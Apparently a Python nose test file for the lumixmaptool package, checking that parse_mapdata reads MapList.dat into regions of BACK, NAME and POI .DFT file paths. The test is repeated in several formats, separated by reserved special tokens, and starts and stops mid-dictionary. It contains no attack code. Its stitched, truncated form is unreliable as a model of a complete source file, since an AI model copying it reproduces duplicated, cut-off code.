'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',
'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',
'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',
'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [
'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',
'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',
'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',
'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',
'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',
'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',
'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',
'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',
'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',
'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',
'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',
'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',
'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',
'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',
'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',
'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',
'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',
'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',
'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',
'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',
'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',
'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',
'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',
'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',
'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',
'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',
'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',
'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',
'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',
'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',
'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',
'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [
'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [
'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',
'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',
'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',
'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',
'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',
'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',
'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',
'POI/P0000053.DFT', 'POI/P0000054.DFT']}}
nose.tools.assert_equal(result, expected)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_parser_test():
"""Check if the evaluation model returns a parser object."""
copy.get_parser()
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, 'misc')
maplistdata_path = os.path.join(misc_folder, 'MapList.dat')
result = copy.parse_mapdata(maplistdata_path)
expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',
'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',
'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',
'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [
'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',
'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',
'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',
'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',
'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',
'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',
'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',
'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [
'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',
'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',
'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',
'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',
'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',
'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',
'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',
'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',
'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',
'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',
'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',
'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',
'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',
'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',
'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',
'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',
'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',
'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',
'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',
'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',
'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',
'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',
'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',
'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',
'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',
'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',
'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',
'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',
'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',
'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',
'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',
'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [
'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [
'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',
'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',
'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',
'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',
'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',
'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',
'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',
'POI/P0000053.DFT', 'POI/P0000054.DFT']}}
nose.tools.assert_equal(result, expected)
<|reserved_special_token_1|>
import os
import nose
import lumixmaptool.copy as copy
def get_parser_test():
"""Check if the evaluation model returns a parser object."""
copy.get_parser()
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, 'misc')
maplistdata_path = os.path.join(misc_folder, 'MapList.dat')
result = copy.parse_mapdata(maplistdata_path)
expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',
'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',
'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',
'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [
'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',
'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',
'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',
'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',
'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',
'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',
'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',
'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [
'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',
'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',
'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',
'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',
'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',
'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',
'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',
'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',
'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',
'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',
'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',
'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',
'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',
'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',
'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',
'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',
'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',
'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',
'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',
'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',
'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',
'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',
'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',
'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',
'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',
'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',
'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',
'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',
'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',
'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',
'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',
'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [
'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [
'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',
'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',
'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',
'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',
'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',
'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',
'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',
'POI/P0000053.DFT', 'POI/P0000054.DFT']}}
nose.tools.assert_equal(result, expected)
<|reserved_special_token_1|>
#!/usr/bin/env python
# Core Library modules
import os
# Third party modules
import nose
# First party modules
import lumixmaptool.copy as copy
# Tests
def get_parser_test():
"""Check if the evaluation model returns a parser object."""
copy.get_parser()
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, "misc")
maplistdata_path = os.path.join(misc_folder, "MapList.dat")
result = copy.parse_mapdata(maplistdata_path)
expected = {
"num1": "00010001",
"num2": "00010001",
"regions": {
1: [
"BACK/B0000035.DFT",
"BACK/B0000036.DFT",
"BACK/B0000044.DFT",
"BACK/B0000045.DFT",
"BACK/B0000053.DFT",
"BACK/B0000054.DFT",
"NAME/N0000035.DFT",
"NAME/N0000036.DFT",
"NAME/N0000044.DFT",
"NAME/N0000045.DFT",
"NAME/N0000053.DFT",
"NAME/N0000054.DFT",
"POI/P0000035.DFT",
"POI/P0000036.DFT",
"POI/P0000044.DFT",
"POI/P0000045.DFT",
"POI/P0000053.DFT",
"POI/P0000054.DFT",
],
2: [
"BACK/B0000024.DFT",
"BACK/B0000025.DFT",
"BACK/B0000026.DFT",
"BACK/B0000027.DFT",
"BACK/B0000033.DFT",
"BACK/B0000034.DFT",
"BACK/B0000035.DFT",
"BACK/B0000036.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"BACK/B0000044.DFT",
"BACK/B0000045.DFT",
"NAME/N0000024.DFT",
"NAME/N0000025.DFT",
"NAME/N0000026.DFT",
"NAME/N0000027.DFT",
"NAME/N0000033.DFT",
"NAME/N0000034.DFT",
"NAME/N0000035.DFT",
